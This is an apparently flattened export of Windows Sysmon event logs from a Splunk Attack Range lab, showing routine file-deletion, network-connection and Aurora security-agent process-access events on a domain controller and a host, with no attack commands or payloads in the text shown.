Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\surveyor-20230118114717-033MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000041527Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:05.598{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56286-false10.0.1.12-8000- 23542300x800000000000000041526Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:08.389{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7732B22EFC84BE448E53F431336700DD,SHA256=4062D4BFA1B524CF790E5D5808DB74D5ED49D5290DD30D808B958350A3485D5A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041528Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:09.494{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BB3A3A8499B8A9BC1DF3E4F10FBDFAD,SHA256=14B4ABD24FA6D2507116420E2DA0987321FD6C1AD418442FEE5C71E7EECC5030,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000016247Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:08.027{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50086-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000041529Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:10.612{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58FAEDB9534542C59D3320135431090F,SHA256=81F861B037030C3002BF147519F24822779C93D60AD769F9DC6FC9799B69E3F8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016248Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:10.027{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C71C1EDA536AB266DC147FAED6A251F,SHA256=A82440771D285512D6864EFB2FC55390E1F13CD6D9F248AC1BA67522FBF2BC21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041557Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.928{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=9E8D4B21C3E3B42B847B193C6FECACA2,SHA256=71C992BB010F5AC3A8A2D43C0B4138366A83B2936FCD4B1049D38512DA45F1F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041556Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.927{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\ADMINI~1\AppData\Local\Temp\etilqs_eo8vdmd2dewo9qbMD5=8025D2DED04BCB2548B6858C5ECC358A,SHA256=A18D3C1A9A5EA346EE2D231B361B2153C6991424F1B1BB07196BCD901C245858,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041555Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.922{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041554Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.919{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 23542300x800000000000000041553Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.917{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=F8195941991914886734F252F501C485,SHA256=774E8A16D7DF8D136ED3179790909EBF8DCF5E9F2A95EF1D5E82FA89928B67AC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041552Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.912{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041551Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.911{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041550Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.907{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041549Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.887{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041548Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.876{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041547Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.867{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041546Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.864{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041545Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.862{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041544Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.860{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041543Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.830{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041542Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.823{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041541Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.818{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041540Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.804{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041539Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.795{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041538Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.781{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041537Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.770{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041536Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.760{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041535Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.753{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041534Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.744{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041533Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.737{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 23542300x800000000000000041532Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.711{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0985EFED36AB48412A8C9A8EFAE7284,SHA256=5D2E97A1594451967FA506C09C3FC13D9996F2B641FCBB358244FC33A82A41BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041531Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.695{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 10341000x800000000000000041530Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:11.691{FE4C2B44-DE08-63C7-F104-00000000AF02}60685124C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013500190) 23542300x800000000000000016249Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:11.107{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BAE82438D82176F330E5656488A87F0,SHA256=D07464338CE3A25E33A713B1CA49EAC12177BEAEA4DC177BA59CC16B235261B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000016250Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 